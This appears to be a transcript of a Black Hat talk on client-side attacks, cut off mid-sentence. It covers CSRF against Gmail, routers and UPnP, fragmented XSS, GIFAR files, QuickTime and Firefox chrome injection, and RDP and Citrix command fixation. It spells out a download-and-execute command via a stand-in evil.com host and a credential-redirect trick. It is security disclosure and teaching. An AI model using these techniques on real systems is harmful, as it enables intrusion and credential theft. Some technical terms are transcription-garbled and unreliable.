Welcome. That's the first day of Black Hat. I'm very happy to be here among fellow researchers and friends, loads of friends. And I hope for the next 1 hour. By the way, I'm completely knackered from my actually traveling from London. So I'm in a completely different time zone, and I feel like it's really late now. So I hope that for the next 1 hour, I'll be as much entertaining as possible. And also that you'll be able to get something out of this talk. So it's going to be helpful. First of all, my name is Petko Petkov. Some of you may recognize me as PDP, which is the acronym of my full name. And I'm associated with various kinds of things and doing all sorts of experiments which are not important today to talk about. But what is important is to talk about client-side security. The thing is that the first time when I took this talk, I was taking this talk to Black Hat Amsterdam, and I was actually very unsure what the title should be, because the fact is that I'm talking about client-side security, but also I'm talking about things which are most of them actually design flaws, design issues. So I was thinking maybe I should call it design bugs or something like this, or maybe I should call the talk something like security, like sort of a simple security bugs, because a lot of the things that we're going to see today are quite simple to explain, and I often compare them to magic tricks. The magic trick, most of the time, the thing is, the important thing in the magic trick is the actual performance, it's not the trick itself. The trick is actually quite simple. But the thing is that we cannot actually, until we actually see what the trick is, we are very impressed, and when we see the trick, we are actually disappointed because it's simple. The same thing is, for example, with a lot of the things. So I think the title client-side security is good enough, and this is what we're going to concentrate today, but we can also pay attention to all these other things, such as simplicity and all other philosophies, which I actually feel very passionate about. Today, before we actually move this into this client sort of a thing, we need to kind of have a little bit discussion about clients and servers and the new ways of doing attacks and old ways of doing attacks, and this first diagram shows how we used to do things. And we are still doing them, and I call this kind this era the era of the razor sharp exploits. We pretty much have a bad guy attacks a good guy, and if the attack was successful, it's a game over. So it's a really sharp exploit, and most of the time we're concentrating on the server side technologies. The reason we used to concentrate most of the time on server side technologies is because the client side was not mature enough. The client side has started to develop like 5 years ago with richer technologies, with all this new sort of a ways of doing things with technologies such as Java and Flash and all this Ajax stuff. And also Firefox has a great contribution to this era. But this is the old way of doing it. This is still pretty much if you find a bug like that, you pretty much win the game, no matter what. However, in the new world, in the world of client-side security, things are not as straightforward. In fact, sometimes we need to sort of imagine or create a tactical design the whole attack. Basically, create a strategy how the attack should work. So in most of the cases, we have the bad guy who uses the good guy to attack himself or to attack a third guy. So things get a little bit more twisted. And with some of the stuff that we're going to see today, you will see that often we combine like various types of technologies. Each one of them individually is secure enough, but when we put them together, they create insecure condition. So this is basically what we're going to talk about today. But before even moving into this sort of thing, I need to talk to you a little bit about this client sort of a server relationship. And I'm very happy that I actually saw the keynote today, because it is very close to what my philosophy is about these things. We often, in the penetration testing world and the security world, we take systems out of context, we test them, we find some vulnerabilities in them, and we put them back into the context. But the thing is that we cannot just, test in these systems individually. We need to take also the system, the systems which in they exist with other systems they interact with. I often say the client and servers are in relationship. They're in symbiosis. Their actually security models is often shared. Not often, actually all the time is shared. So the security of the of an individual client often depends on the security of the service it communicates with, and also the security of a server depends on the security of the individual clients it communicates with. So just to give you an example, if you listen down to DNS talk, pretty much we have a server-side flaw, which when exploited successfully leads to a lot of client-side problems. It doesn't lead to much problems on the server itself. On the other hand, if you have a very, very secure VPN solution, which requires the user to use a strong group password, and also you have a token, all that interesting and good security mechanisms, but the client itself was in an insecure Wi-Fi network, in which case the attacker gained access and installed, I don't know, maybe DNS tunnel from where they can execute the commands and all, like establish the communication. As soon as this client gets back to the VPN network, you know, now you're actually dropping an insecure client into a secure net, through a secure server. So you have, again, that special relationship. And we can see that relationship everywhere. The thing is that the last time when I presented this talk, that was in Amsterdam, and then I presented in a couple of other conferences, just as Hack in the Box. To be honest with you, I basically had a lot of vulnerabilities in 50 slides, and I was rushing through all these vulnerabilities, and I'm trying to show how all of these vulnerabilities work. And my general idea was to actually send a message about the types of vulnerabilities. This time, I'm going to do the same, but now I put them under categories. So I hope that the presentation is going to flow much smoothly, and it's going to be as boring as last time, because if you look at it from a psychological perspective, somebody bombards you with too much information, you actually fall asleep. It's actually very valid denial of service attacks for your brain. So we can actually look into a couple of acronyms, which I needed to invent myself, and I hope that nobody uses them. But actually, we're going to use these acronyms as a guide. The first types of attacks that we're going to look today, I call them cross-context request forgeries, and some of you who actually recognize the cross-site request forgery attack probably already know what we're actually going to talk about today. But I actually choose the word context because it has a special meaning. When we're actually talking about cross-site scripting or cross-site request forgeries, we often restrict ourselves in the domain of sites. But that's the reality is that there is a lot more than just the sites. We have application-to-application types of attacks. We have protocol-to-protocol, protocol-to-application, and we have many types of combinations. So if we restrict ourselves in the domain of web applications, then we're going to just stay there, but these attacks are equally applicable everywhere. So we're going to discuss basically cross-site request forgeries, but we're going to look at them from many types of angles. The first type of angle is going to be a typical cross-site request forgery attack. And in this one, just to illustrate what actually means to those of the public who actually don't know it yet. To me, cross-site request forgeries is the biggest design bug of all time. And it's not fixable. It's not like we can add some special stuff to the browser and we suddenly is going to fix it. No, this is how the way the web works. It works based on the top of cross-site request forgeries attacks, which we now employ as a form of attack. Which means that every time you click on a link, that's a request forgery. Every time you do a PayPal transaction, that's a request forgery. Every time you do social bookmarking or any of that sort, that's a request forgery. That's what request forgeries rely on, which means that we cannot actually fix them. We have to live with them. So the only way to fix them is to actually improve the way we program code. So this is the first example, which illustrates a simple cross-site request forgery attack, which leads to catastrophe. The attack falls like this. The user logs into their Gmail. They visit a malicious website while still logged into their Gmail. And invisibly, of course, this third screen just shows you the result. But invisibly, the malicious user, adds a filter into the filter list of the Gmail client, which basically instructs every new email that should arrive on that inbox and has an attachment. In this case, I just used that sort of a rule set. And has an attachment will be forwarded to the attacker. Now, the email itself is not going to disappear, but there will be a copy sent to the attacker. So this is a very valid and very, it's sort of a persistent backdoor within your email client. Because now we're moving into this web-enabled world, we're going to see more of this type of attacks. This is a simple cross-site request forgery, which also Google has prevented, they try to protect from. But the protection, which usually involves adding a tokenized identifier within the form. The token was there, but there was not sufficient checks. So although it first, when you look at the source code, it seems that there is a protection, but when you actually try to perform the attack, you see that there isn't any. But luckily, it got fixed, and we are happy. Now, there's other types of cross-site request forgery attacks. And the thing is that they actually expand just beyond websites. We can go even to this sort of a thing where we attack even routers. And we found many types of vulnerabilities, especially earlier this year, we're actually doing this router hacking challenge where we're actually looking for a lot of vulnerabilities in routers. The devices that's the first device that you use to connect to your internet, whether that's going to be a Wi-Fi, ADSL, like whatever kind of, doesn't matter what kind of a router. We found a lot of vulnerabilities in the BT Home Hub, in which case we could actually overwrite any setting in the BT Home Hub, completely own it with a single request. And we found even esoteric types of vulnerabilities, such as the cross-site request forgery within the Snop VoIP phone. Now, this type of vulnerability actually instructs the VoIP phone to create a conversation between the phone and any arbitrary number that we provide. It could be actually a SIP address. The interesting thing here is that the clone does not indicate that there is a connection has been established. And it puts also the phone in a speaker mode. So essentially we turn a phone, a VoIP phone, into a very powerful bug, very powerful device which now can survey the room where the phone is. And again, there is no indication that this conversation has happened, so the user visits the website, and suddenly everybody can listen what's going on in the room. But we move forward, and a different type of attack, which is based on this type of a technology, right, is an attack which affects file upload facilities. Now, we found also, when we were examining these routers, and we found that not only in the routers itself, but also across the web, nobody actually doing anything about file upload facilities. The reason that is because file upload facilities work slightly different from the traditional types of requests we usually send from our browser. We have a get and post request. They're based on certain types of encoding mechanisms. The file upload is based on a completely different type of encoding mechanism. Often, developers actually don't do anything about these file upload facilities, and they don't do anything to prevent cross-site request forgery attacks. We try to find a way around basically this to exploit them, and it's not very easy to exploit these attacks from the browser because the browser does not have the facilities to actually provide to exploit this attack. But Flash does. So often say if the browser restricts you in one area, then probably Flash is a good substitute for that area or even Java. When you put all these technologies together, Flash, Java, and the browser, we have suddenly no restrictions whatsoever. The restrictions get lost, the same origin policy is broken. In this particular case, we're using a simple application which is written in MXML, I think, or MX something. It's the new Flex engine for Adobe Flash. This application forges a simple request to a file upload facilities. In this case, we're actually uploading a config file to a router. We also managed to upload a whole firmware to the router. So basically, imagine the scenario, you go visit the website, suddenly that malicious website uploads a new firmware in your router and you don't actually see anything happening there. As soon as the attack is completed and if your router does not crash and completely renders your router useless, if the attack succeeds, now the attack is routed, completely routed to your router. They have a complete access to this router, and in some cases, the routers are based on open standards such as Linux. They'll be able to easily decompile it to actually, you know, unarchive it, put more stuff in, put more backdoors, and, you know, create a new, actually, firmware, which, once backdoored, is going to allow them to get into your network. So file upload facilities can be exploited using this cross-site request forgeries. But even gets even better. How about exploiting any type of device, regardless whether it is a router, or maybe it could be, I don't know, your Xbox. It could be your phone. My phone actually supports something known as UPnP. And also it could be your fridge in the future, because UPnP was designed for the purpose of technologies. When you drop these technologies into a network, these technologies should be able to interact with each other. And not only that, they should be able to know what each technology is. So for example, if I drop a printer, and if I drop my fridge, and if I want to print, I don't know, the context of the fridge, I should click on a button that should go to my printer and get printed. That combination, that thing should happen automatically. I should not spend time actually setting it up. So UPnP is a very powerful stack of technologies. And before our research, a lot of people believed that it's not possible to attack UPnP, mainly because one of these technologies that is in the UPnP stack is the Simple Discovery Protocol, which is based on multicast clouds. Now, multicast is not routable, of course, and of course we need to have an Ethernet, like local LAN access to the network, in order to start, playing with UPnP. But also, what a lot of people didn't recognize is that the last technology in the UPnP stack is SOAP, and SOAP is based on HTTP. Now, we were looking for ways to exploit SOAP requests over the web. So you should actually visit a website, and that website should take control of your router using a simple SOAP request. And it turns out that although the browser does not provide with the features which are required such a thing to actually happen, right? Flash does. So in order to actually forge a request, we basically need to create a simple application in Flash, create the SOAP payload, which is encoded here in Euro encoding, I believe it's base64. No, it's Euro encoded. And then we need to supply a special header, which is the SOAP action. SOAP action is a special header. Of course, the browser does not allow me to provide special headers when I do request forgeries, but Flash does. And because of that, now we have an attack vector. Now, everybody can actually take this thing and turn it into a very powerful sort of attack, because a lot of routers have very weird features. Through UPnP, sometimes it's possible to change the DNS settings on the router. And of course, this is unauthenticated. You're never going to get prompted with username and password or any sort of anything like this. It's completely unauthenticated. So in this case, we're using actually a web technology attacking a router. Through web, of course. So if you can call, it request like site forgery or something, but I like to use the word context forgery. And some of the attacks which I'm going to talk about later, they're forms of cross context forgeries, but also fit in another category which I'm going to talk later, which is called command fixation attacks or parameter fixation attacks. But we're going to move on, and we're going to actually talk a little bit now of this cross context scripting. Now, the thing is that about cross-site scripting, and I think there is a lot of misunderstandings about this type of attack, is that when we say site, we often think that we're going to exploit site A through site B. The thing is that even when we exploit site A through site B, this is not even site-to-site exploitation. We're actually exploiting the same origin policies. So even saying cross-site scripting is not correct. We should say cross-origin scripting or something like this. Site scripting is completely bogus, and in fact, when we come up, I don't know, when we actually, all of us agreed to use this term, we made a huge mistake, because these cross-site scripting attacks, they exist everywhere, in a different forms, in a different types of weird combinations. The first one, I'm going to show you again, a simple cross-site scripting attack. We're going to take this one, we're going to lift it, and we're going to actually see how this thing applies to other types of technologies through vulnerabilities which are quite real, and we've been discussed before. The first one is actually happening in a website. Most of you probably don't know, but it's not such a big thing, but it's a weird type of a cross-site scripting attack, which requires a little bit of more imagination, just the traditional ones. This is a persistent like cross-site scripting attack, and as with other cross-site scripting attacks, we can inject like weird characters, metric characters such as greater than or less than. The only problem in this type of attack is that we are restricted only to 10 characters. Now, if you try to inject something in 10 characters, you will see that it's not possible to do anything interesting in these 10 characters. You cannot even inject script source equal to something. You don't have space for that. But what we can do now, we can leverage the weird nature of the browsers and the way browsers actually render forms and render HTML. We can take that and we can trick the browser to render chunks of our code in such a way that actually meaningful. So we can actually split the website into chunks. Some of these chunks contain that was script injection sort of thing. Other chunks contain just pure data which does not have meta characters. Now, this attack is known as fragmented cross-site scripting attacks, and it works by actually commenting out blocks of HTML. So when we actually inject the whole thing, we don't inject it in a single field. We inject it like in a couple of places, a little pieces. So we inject here one thing, here another thing, here another thing, and here another thing. The browser is going to render the whole thing, but when the whole page renders, the parts that are in between is going to kind of cancel each other. So one's going to be left is our real code. So this is the weird nature of this attack. And of course, we have a cross-site scripting condition. It's easy to understand. We've seen that already. It's not such an interesting thing. This was the result, by the way, of the attack. Of course, it was not intended to be malicious. But we can actually go a little bit further. And I'm not going to talk a lot about this topic, because there will be another talk, I think, tomorrow, that's going to go much into the details of that sort of attack. And, of course, probably a lot of you have heard of this thing. It's called GIFAR thing. It was across the most of the media outlets lately. So here's an example. We have two technologies which are by themselves not that important. We have the JPEG image. Well, they're important, but not that malicious. Right? We have the JPEG image, and we have the zip file. We also, in the Java world, it's called JAR, which is a Java archive file. Now, what happens is that if we take an image file and a JAR file, and we put them together, we create a hybrid file. The reason it is hybrid, you can try the following. Take a JPEG, take a zip file, put them together, they just stuck them together next to each other. And the JPEG should be the first half, the zip file is going to be the second half. Rename the file to something.jpg, double click is going to open as image, view it in your browser is going to open as a simple image. Even if you try to detect whether this is an image file by using file utility or using any of this image manipulation library, it's going to tell you that this is a valid JPEG image. But if you change the extension from .jpg to .zip and double-click it, it's going to open as a folder. So it's a JPEG file and zip folder, zip archive at the same time. Now, when I presented this thing for the first time in Black Hat Amsterdam, I didn't exactly know why this thing works, because I was lazy enough not to research it. But FX from the Phone Elite group, after the talk, he actually told me that the reason this thing works is because the headers of both files are in different locations. So the headers of the JPEG image are on the top of the file, of the head, and the headers of the zip archive is at the bottom. So actually, parsers are going to go different ways. So the first parser is going to start rendering like this, the second parser is going to start actually reading like that. And because of this sort of thing, we now can create a hybrid file. Now, why this thing matters? It matters because a lot of websites, a lot of places, not only websites, don't think about websites only, think about anywhere we can put an image. It could be a website, could be some application that you're using, could be instant messaging client, could be anything. It doesn't matter what it is. The thing is, what matters here is that we create a JAR file. We actually ship a JAR file into some location. So if we actually upload an image file into some web server, suddenly that web server now hosts an applet. So that applet now can actually access certain things. And I said, for more information, you can actually go visit the talk tomorrow. Nathan and the ex-Sniper's crew, they actually have prepared some stuff against Google. And they're going to explain how exactly it works in that context. But this is basically a form of persistent cross-site scripting attack, and also a form of a applet or whatever you want, JAR executable, getting shipped onto the client side. And that applet or that Java executable file has a lot of access when run from the file system than actually run from the web as a full access. Another type of a cross-site sort of context scripting attack is basically this sort of issue which happened to be in Firefox. Not that long time ago, it was possible to mislead the browser to actually think that certain URLs originate from different origins. So in this very simple attack, we basically trick the browser by using something called, you see how this JAR thing has been reused everywhere? And this is something that I actually want to bring to much later, that we are reusing technologies, and so as a result, we actually bring issues from their world into a different world of this technology reuse. So here, we're using JAR files. With JAR files in Firefox, we can actually specify the location of a file that is within that JAR archive that should be rendered. But because at that time there was insufficient checks within the Firefox browser, it was possible to create a condition where, for example, I can host a file, a JAR archive on my server, and then I can actually say, using Google, for example, and the 302 redirect in Google, I can say, okay, go fetch that file, and it's going to just create a simple, 302 redirect with location. And then if I stick this JAR thing in front of it, basically tells the browser, render that archive, render the HTML from that archive, but the browser will think that this information comes from Google itself, although this technically it doesn't come from Google, and it creates, again, an insecure condition. I'm not going to go into it. There's actually more important things to discuss. This is another form of actually cross-context scripting, and we are now getting more into actually exploiting the client itself, actually gaining access. I would say that it is enough if somebody compromises your Gmail account. It's a devastating effect. It's going to create a huge hassle for you because probably you'll never be able to actually get it back. So it's enough for someone actually hacking your online identity to actually cause tons of problems. But we can even actually hack the client. So in this case, we use QuickTime to attack Firefox. Now, QuickTime has this feature, which is called QuickTime Media Links. The things about QuickTime Media Links is that they're almost like glue files, and they can have any type of an extension. You can think of the QuickTime Player support. So we can have a QuickTime file, which is, as you can see on the top of the example, this is a simple XML file. But this XML, this simple XML file can have any extension. It can have an extension .avi, .move, .mp3, .mp4, anything that we can play in QuickTime Player. Now this file, basically, again, it's a simple meta file. It just instructs what movies should be played into the player. But it has also a special parameter, which is called the QTNext. QTNext parameter instructs the browser to open a certain URL when you finish playing those files. The only problem is because QuickTime was initially developed for the Apple platform and was later ported to the Windows platform, there wasn't much understandings about what is really secure in this case. As I said, both technologies are developed in a completely different context and they were put together thinking that they're actually going to work together really nicely, but they don't work nice. In this example, because QuickTime takes the whole thing into their hands, we'll be able to inject commands within when the browser starts. So we can inject parameters. We can inject parameters when the browser starts. So we can specify something called Chrome. By the way, this is does not work anymore because Firefox actually removed that Chrome thing just to ensure that other applications cannot do the same thing. And there was actually a plethora of applications that actually can do exactly the same thing. And not only QuickTime. But because they removed it now, it's much safer. But anyway, we could have actually provided something like dash Chrome and just instruct the browser to interpret the next string as a URL that will be executed in the Chrome zone. The Chrome zone is the most privileged zone in the Firefox browser. All your extensions, the browser itself runs within the Chrome, which means that we have a complete access to XP.com primitives within the browser. We can create files, launch applications, modify the browser itself, install extensions, backdoor the whole process, install a sniffer within the browser if you want, anything. In this case, we're actually running a simple command, the calculator, just to prove that it works. And it does work. But it gets even more interesting. Are there actually other extensions that we can compromise in similar ways? And the thing is that, yeah, there are actually tons of extensions. And even a couple of days ago, Mario, another member of our group, actually he showed me a problem within a popular, which I wasn't aware of, but apparently it's a very popular extension for developers, especially in Germany, where he's based. And this extension allows you to run tests, so you can actually check your application for whether it's actually been written correctly or not. But this extension actually has a Chrome execution problem, so in a similar way to the Firebug. Firebug is a popular extension for Firefox, mainly used by developers. Yeah, it's not widely used by people, but I would say if developers are using it, that's a perfect way of gaining access to some popular products, and maybe even backdoor the source code to these products once you get access to these developers' boxes. The Firebug has a problem, context scripting problem, where we'll be able to jump from the context of the web page, which is the origin is going to be HTTP or something like this, into the context of the Chrome, or the origin of the Chrome. Between them, there should not be any interactions, otherwise this creates a security problem. Using something like this, here I illustrate how we inject the payload. The payload is basically a simple sort of a chopping exercise where we actually push back into the Chrome zone a function. That function actually allows us to run files. We need to run a couple of this sort of a commands in order to actually put the whole thing into the Chrome basically zone. Once we do that, we can write another function, which in this case I call just function execute. And that function does exactly the same thing as we did before, but actually does it automatically. It does the chopping automatically. And then while we're still in the browser, now we can do something as simple as just saying execute calculator.exe. So we have now a super user-friendly function, which we've created ourselves, that is, when you visit a website, that website will be able to do all this stuff, well, used to, and then launch applications. Again, you can do a lot more than that. This just illustrates the attack. But it gets even better. The thing is that a lot of, I'm saying that this Ajax thing and this Firefox thing and, you know, basically contributed to the rise of these rich technologies. The reason I'm saying is that because we are reusing them. We actually reuse monsters. And actually, I don't blame ourselves because nobody wants to reinvent the wheel over and over again. So, for example, imagine an instant messaging client. Every time I see an instant messaging client, I see only one thing. I see Internet Explorer. Because the instant messaging client, all of them, GTalk, Skype, AIM, all of them, are based on Internet Explorer. The reason is because nobody wants to actually go through the hassle of creating a interface where you can render smiley faces or do underline or blinking text or even embed a video. I mean, the browser already can do that. Why the hell we don't actually use it in our application? And when we actually type our messages, what we render there is actually HTML. Fair enough. But the problem is that when we embed this Internet Explorer thing, we are actually, and most of the developers who developed this instant messaging client, they was not aware that they're embedding an insecure version of Internet Explorer, the unsandboxed version, the pure version of Internet Explorer. The pure version of Internet Explorer allows you to do a lot of things. Internet Explorer is the standard component of the Windows operating system, and you can even actually create applications based entirely on Internet Explorer, and it's called HTML applications. These applications allow you to do a lot of things through ActiveX controllers such as the Windows Scripting House controllers such as WScript. In this case, we're using a vulnerability in a cross-site scripting vulnerability on, for example, a website such as Dailymotion or Metacafe, right? And then when we inject some code there, we create a cross-site scripting attack. But we are not interested in that. We're not interested in actually cross-site scripting Metacafe. That's not interesting. What we're interested in there is to put a little bit of a code which will not execute in any sensible browser, because this code is purely malicious, purely requires a lot of privileges in order to run. So if you go there with Internet Explorer, it's not going to run, it's going to completely fail with a huge error message. However, if you force the user to actually open that page in some way, or even retrieve that information through their Skype player, which basically does not have the restrictions of the normal Internet Explorer browser, then suddenly this code works. So now we have a scripting condition that comes from the browser, goes into your Skype player or any other, you know, instant messenger or any of that sort, and now it's going to compromise your box. Because once we're able to run WScripting, like Windows scripting commands, we can do whatever the hell we want in this system. It's up to us to decide what we're going to do with it. This vulnerability was discovered. Part of it was discovered by Miroslav Luchinski. And the second part with the Metacafe is discovered by Avi Raff. It's actually very impressive research. But the thing is that it's even possible to go beyond that. How about actually injecting this stuff over the air? How about you are chatting with some guy on Skype or something, someone else, and then basically someone in the same network injects stuff into your Skype player and compromises you completely? It's possible because all these instant messaging clients, they're actually pulling ads from some external location. Now, in the case of Skype, these ads are coming in an encrypted format, so we cannot actually tamper them. However, these ads are Flash applications. Now, Flash itself probably can pull other stuff, such as graphics or more Flash files to render the ad, right? And this stuff actually don't go through HTTPS, or even if they go, there's no actually validation whether they're actually fetching it from the right server with the right SSL certificate. And most of the time, we can actually tamper it. Not most of the time, all of the time. So in the case of Skype, we actually can use tools such as AirPwn or Karma. So if we're in the local network and you have your Skype player running, such as in the background or something, then the attackers can actually attack you again and get access to the system. And with this thing, pretty much, we saw how we can actually shift from one context to another. And there's actually a lot more examples. There was one example with the AIM, I believe, which again, because it's based on the browsers, and browsers can actually render JavaScript, they can render images and those sorts of other things. Perhaps they can even render applets. So now, because of this, now we can actually combine, mix and match technologies. We can use one technology and put it into different contexts and actually take advantage of the environment, not taking into consideration that sort of combination. But it's getting even better. This is the other thing which I'd like to talk about today is called command fixation attacks. Very often I actually call them parameter fixation attacks, and I'm not trying to be funky with the names here. Probably you can find better terms, please do. But to me, this describes the attack in the best way. I'm going to give you a simple example. A command fixation attack in RDP. RDP, which is basically the Windows Terminal Services, it's possible to write an RDP file. The RDP file are simple description files, which when double-click connects you to a remote server, the desktop server. Now, some of these servers require your authentication. So sometimes you need to actually authenticate. Other servers don't require authentication. They will pop up an application, basically. But most of the time, you can provide something called alternative shell. Alternative shell string is usually used to specify if you want to execute something else apart from explorer.exe. So maybe in some environments, I can provide an RDP file that will launch some business workflow application. So instead of you logging into your desktop, you see the first thing that you open up, you see a business workflow application, right? But in our case, we can also provide other commands, such as the cmd.exe. So if you do something like cmd.exe/c, we say tftp to evil.com, fetch me evil.exe, and then execute me evil.exe. And when we open that RDP file, if we are not required to authenticate with the server, that command is going to execute and it's going to own the box. Depends what, of course, evil.exe does. Is going to run with the current permissions of the user, actually run getting into that terminal services. If it requires us to actually authenticate with some credentials, most users probably is going to be fooled to type these credentials, and when they log in, that command will execute again. Of course, that depends on some configurations that you need to apply. You can actually prevent that type of attack from happening, but most of the time, it works because I've tried it in so many business environments. The thing with RDP is that if in case, for example, we need to actually, you know, ask the user to authenticate or whatever, then we might actually need to use social engineering skills. This is the less severe attack, which I'm going to show you one later, which is a lot more severe than this one. So we need to pretend to be, for example, someone. We can pretend to be, I don't know, the tech department and say, yeah, please try this RDP file. We made some changes. I'm not asking them about username and password. I'm not asking them, please give me the username and password. I'm just saying, here's a file. It's a simple text file. Open it up and try to log in. If you log in, good. But when you log in, something's going to happen. You don't know what's going to happen. You're going to get owned, basically. But RDP command fixation attack is going to get even more interesting in the future, because one thing that I've been actually looking lately, and of course I have no clue how this thing is going to develop because I have no access to this technology, is called Live Mesh. Now, Live Mesh is a new Microsoft technology which is going to enable RDP to go over HTTP. So now we use the port 80, the universal backdoor, also for the RDP communication channels. And now we'll be able also, in this Live Mesh environment, we'll be able to actually connect a couple of computers to a mesh. So now we'll be able to access all the computers whenever we are. So imagine, you just go to livemesh.com website and you log into your thing with your Yahoo password. Hotmail password and username, which it's just a problem on its own. Then you find your system that you want to connect to, you double-click and you open a remote desktop on that machine. Now, this is scary because you can receive the RDP file from everywhere, right? And the RDP file launches automatically. You don't even ask whether you want to launch it. This is marked as an automatic launch, which means that if I create an iframe and I put it to an RDP file, as soon as Internet Explorer sees that, it's going to start it right away. It's not going to ask me, do you want to actually start this file? No, it's going to start right away. And if it's a quick enough, it's going to do itself and it's going to close. So you can do a lot of damage with this, but this is the future. So basically look out for this technology. It's going to come out soon. You'll be able to see, I'm giving tips about what vulnerabilities probably there will be in this technology. But it's even it's better because the other technology which is close to Windows remote desktop is Citrix. Now Citrix environment extremely popular and they're everywhere, especially in the business sector, they're everywhere. Now Citrix can do exactly the same thing as RDP, but in this case the file is called ICA, I-C-A. And in this case we can also supply a parameter which is called initial program. And again, initial program could be, you know, cmd.exe, tftp me to that server, get me that file, execute that file, and that's it. But what is interesting about the Citrix commands is that they actually, the Citrix environment is a lot more powerful than the Windows remote desktop environment. The reason it's more powerful is because, first of all, I don't need to specify the server of the that I want to attack. That actually gives me a lot of benefit if I want to do a blind attack. Because in the previous example, I need to tell the RDP file which server I want to connect to. But in this case, I don't want to give that. I mean, I don't have to give that. Because as long as you have Citrix Neighborhood installed in your computer, it's going to know which server to connect to. It's going to pick up the first of the list or whatever logic it follows. The next thing, which I don't need to basically do, I don't need to say to the user, if the Citrix server, for example, asks the user to actually to authenticate, I don't need to actually ask the user to authenticate themselves when I show this file to them. I can use something called pass-through authentication. Pass-through authentication will take the credentials from your system, your NTLM credentials, it's going to send them down the pipe to the Citrix server, and if that Citrix server is configured to actually log in pass-through authentication, it's a part of a domain controller, that thing is going to work. So now we can create a very standalone file, which you, this file you can receive from anywhere on the web, and the attacker does not need to know anything about your environment or your business environment or any of that sort. They don't need to know that. As soon as you visit this special website, which basically embeds one of these files in an iframe, such as the example below, as soon as this thing happens, that's going to launch automatically. Again, you're not going to be asked whether you want to do something or not. It's going to execute. And if the remote server, which most of the cases are configured to use pass-through authentication, then the attacker will execute successfully, and of course the attacker will be able to gain access on the remote server, not your computer, but on a remote computer, which is still something. Of course, the same attack can be performed with the ActiveX controller. The ActiveX controller can knows that. Even if you're not in a Citrix neighborhood, you can actually brute force the target. It's quite easy, and you can write all that through the ActiveX controller, and you have a full access to actually do whatever you want. You can fingerprint. You know, if the user visits the website and the website embeds this ActiveX controller, the ActiveX controller will be able to actually fingerprint the servers that are inside the network. They'll be able to fingerprint the applications that are inside that network as well. They'll be able to tell. I mean, you'll be able to tell a lot of things just using by the ActiveX controller. And the ActiveX controller comes by default with the client. So if you install the client, you get it as well. Now, another example of this sort of a command fixation attacks, we actually put commands in which the user will execute without their knowledge. It's something that was I discovered in the Second Life. It's possible to use a combination of Internet Explorer and Second Life to steal the Second Life credentials. And you basically do with this protocol thing, which was a big thing last year. We can basically say Second Life, which can instruct the Internet Explorer to actually look for the Second Life, the URL handler, look for the URL handler, and is going to send some commands in. And then we can actually use this double quote thing, which follows next, which is going to do some kind of escaping. And then we can provide some parameters there. One of them is called auto login, which is going to instruct the client to automatically log in. But the second parameter, which is called login URI, is going to specify where exactly we want to log in. So what happens now? It happens that if you visit the website, that website will instruct automatically to launch Second Life. Again, you're not going to be asked whether you want it or not, right? It's going to just execute automatically. And you're going to send your credentials without you being asked. You're going to send these credentials to the evil login PHP thing. And this credential is going to be received as an MD5 hash. Now, of course, yeah, this is hash, but of course that hash hasn't been salted, so we can easily crack that. Or we can actually replay that command. Because a simple XML RPC, we can actually replay that command against the second line service, and we can transfer some lindens from their account into ours. Another thing, which I like to call drive-by Java. Drive-by downloads, very popular topic. A lot of botnets and highly successful botnets are using drive-by download technique, where basically simply instruct the user to do something, such as they show them some Tetris game or something like this and say download that thing, and as soon as you download, you're part of a botnet. Or you go to a website and say, this is the latest Paris Hilton, I don't know what video, and if you want to see it, please install this codec. So you install a codec and basically get owned again. But the thing is that in order to perform these actions, you ask a couple of times. The browser asks you a couple of times. In fact, in order to run an application from the browser, if the browser sends you an application, you're going to be asked at least 3 or 4 times. Right? The first thing is going to ask you to download it, then it's going to ask you whether you want to execute it, and then it's going to ask you whether you really, really want to execute it because the application hasn't been signed by the proper authority. So three questions. Right? With the Java runtime, if I sign my applet with any arbitrary certificate which I can generate myself, in which I can fake any of the information, can say Microsoft Corporation, Universal Patch, I don't know what, and basically that's going to pop up a box when you visit the website with this thing, it's going to pop up a box, and it's going to say you run or cancel, 50-50 chance. If you choose the blue pill, you die. Cancel, you continue to leave, until the next time. Or that sort of a mechanism can be forced on you. You can be repeatedly asked about this sort of a thing, run, cancel, until you click run. So you'll be tormented until you click run. And it's very easy to create such a kind of a file. And they are very successful. Especially in business environments, especially in banking environments. Because a lot of banks, what they do is they actually create this very fancy GUIs. So you go to their website, you log in, and then you see this like a Java thing pops up. But this Java thing actually needs a lot of access. So usually they sign it, and they actually train you to click on run when you see this sort of a dialogue. Sometimes they don't even actually sign it with a proper certificate. They sign it, they use self-signed certificates. So actually they train people to click run when they see that box. And it's amazing how many people fall for this type of attack. The applet can be something as simple as this. So we say it's a simple applet. In this case, I actually made it look like a 3D game, Super Mario 3D, whatever. And it's going to say, runtime, get me runtime, execute the calculator. But how about this one? Now, this is actually a combination of the three technologies which by themselves do the right thing because they were developed separately from each other. By themselves, they do the right thing, but when you put them together, they completely mess it up and create an insecure condition. So in this case, we have again QuickTime, which passes the execution to Windows, which passes the execution to Java. Are we compromised the client? Now what happens here is the following. Actually, this is not... basically, this simple file here, it's a SMIL document. It's a SMIL, it's a kind of interactive document. It looks like HTML, but it's a sort of a for representation stuff. QuickTime understands that. Again, this SMIL document can be faked as any other file, so it can have an extension, .mp3, .mp4, it doesn't matter. As long as we put the server header sniff thing, which is at the beginning of the file, which is called SMIL text. As long as we put that thing in front of the file, we can rename the file to whatever extension that we want. It can be MP3, it can be MP4, it doesn't matter. Now, this SMIL file basically has a lot of junk in the middle, which instructs showing some images, which are completely irrelevant. We can actually remove them. But again, it has something called Qt Next. Again, it's quite similar to this Qt QuickTime Next thing in previously, which I showed. But it's slightly different. In this case, we actually say to do file, to use the file protocol, and then we say connect to that server, 172.16.3.1.24/evo, evil.link. Now, most of you probably recognize this. This is actually one of the weird ways of specifying a net bias notation. Actually, specifying a file in a net bias notation. Now, what's going to happen next is that as soon as this file finishes playing, QuickTime is going to take that URL and is going to send it through the file protocol handler function. The file protocol handler function will understand what exactly this URL means, and it's going to say, "Oh, this is actually a simple URL which points to a net bar share," which is great. Now, what if we point to a jar file? So we basically say file some IP address folder evo and slash evo.jar file. Now, if you have the Java runtime environment, Windows will figure out that we're opening a jar file and is going to look it up in the industry and say, "Oh, jar file is associated with this protocol handler. This protocol, the way to run jar is by using the Java W, the Java for Windows executable.exe, and is going to pass the entire URL to that command." However, Java does not know anything about this notation. So if you do that, if in this example you basically say the same thing, evo.jar is going to fail with the message, Java is going to say, "I don't know how to open that file." So in this case, we're using a simple Windows link. So the Windows link is going to actually rewrite the entire URL into the correct net bias notation, which actually Java understands. And the operating system understands. So it's not going to use anything fancy. So the execution of 